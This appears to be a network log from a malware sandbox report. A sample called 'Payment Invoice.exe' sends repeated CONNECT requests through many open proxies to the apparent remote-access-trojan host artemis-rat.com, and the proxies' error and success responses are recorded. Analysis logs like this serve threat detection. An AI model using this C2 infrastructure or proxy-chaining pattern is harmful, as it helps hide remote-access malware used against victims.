                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1535192.168.2.454366117.160.250.13888997076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.348665953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.527151108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.141546011 CET303INHTTP/1.1 400 Bad Request
                                                                Server: openresty
                                                                Date: Mon, 11 Mar 2024 15:15:22 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 154
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1536192.168.2.45471867.43.228.253263237076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.349337101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.850514889 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1537192.168.2.454782107.173.255.18312347076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.355453014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1538192.168.2.453783119.3.215.4188887076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.355880022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1539192.168.2.454802104.20.75.132807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.355880022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.509984016 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1540192.168.2.454808185.162.230.201807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.356511116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.511260986 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1541192.168.2.454809104.21.85.109807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.357938051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.512115955 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1542192.168.2.45387891.134.140.160308957076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.358275890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1543192.168.2.454719162.223.89.84807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.358424902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:26.978024960 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:16:26 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1544192.168.2.45485045.144.30.2324437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.363863945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1545192.168.2.45485545.144.30.2324437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.365910053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1546192.168.2.454473117.160.250.16388287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.367549896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.527050018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.066314936 CET221INHTTP/1.1 403 Access Denied
                                                                Date: Mon, 11 Mar 2024 15:15:22 GMT
                                                                Connection: close
                                                                Cache-Control: no-store
                                                                Content-Type: text/html
                                                                Content-Language: en
                                                                Content-Length: 43
                                                                Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                                                Data Ascii: You are not allowed to access the document.


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1547192.168.2.45485645.144.30.2324437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.367985010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1548192.168.2.449824171.244.140.160374007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.368642092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.511190891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1549192.168.2.45485745.144.30.2324437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.369004011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1550192.168.2.449850123.108.98.10856787076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.371885061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1551192.168.2.454820104.23.107.172807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.379740953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.534009933 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1552192.168.2.45467527.96.235.171807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.386892080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.027158976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1553192.168.2.45265145.65.65.1841457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.390197992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1554192.168.2.454126185.5.209.101807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.405561924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.862436056 CET749INHTTP/1.1 500 Internal Server Error
                                                                Date: Mon, 11 Mar 2024 15:15:27 GMT
                                                                Server: Apache/2.4.56 (Win64) OpenSSL/3.0.8 mod_jk/1.2.43
                                                                Content-Length: 530
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 61 64 6d 69 6e 40 65 78 61 6d 70 6c 65 2e 63 6f 6d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at admin@example.com to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1555192.168.2.4546778.217.143.187156737076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.408466101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1556192.168.2.453883110.34.3.22931287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.426929951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.446978092 CET525INHTTP/1.1 502 Proxy Error
                                                                Date: Mon, 11 Mar 2024 15:15:23 GMT
                                                                Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1o
                                                                Content-Length: 348
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 32 20 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 72 65 63 65 69 76 65 64 20 61 6e 20 69 6e 76 61 6c 69 64 0d 0a 72 65 73 70 6f 6e 73 65 20 66 72 6f 6d 20 61 6e 20 75 70 73 74 72 65 61 6d 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0d 0a 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 3c 70 3e 52 65 61 73 6f 6e 3a 20 3c 73 74 72 6f 6e 67 3e 44 4e 53 20 6c 6f 6f 6b 75 70 20 66 61 69 6c 75 72 65 20 66 6f 72 3a 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 70 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>502 Proxy Error</title></head><body><h1>Proxy Error</h1><p>The proxy server received an invalidresponse from an upstream server.<br />The proxy server could not handle the request<p>Reason: <strong>DNS lookup failure for: artemis-rat.com</strong></p></p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1557192.168.2.45470641.231.37.7631287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.427906036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.761797905 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1558192.168.2.45321474.118.80.24431287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.431083918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1559192.168.2.4547228.217.95.4488997076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.437767982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.753957987 CET711INHTTP/1.1 502 Bad Gateway
                                                                Server: nginx/1.25.1
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 559
                                                                Connection: close
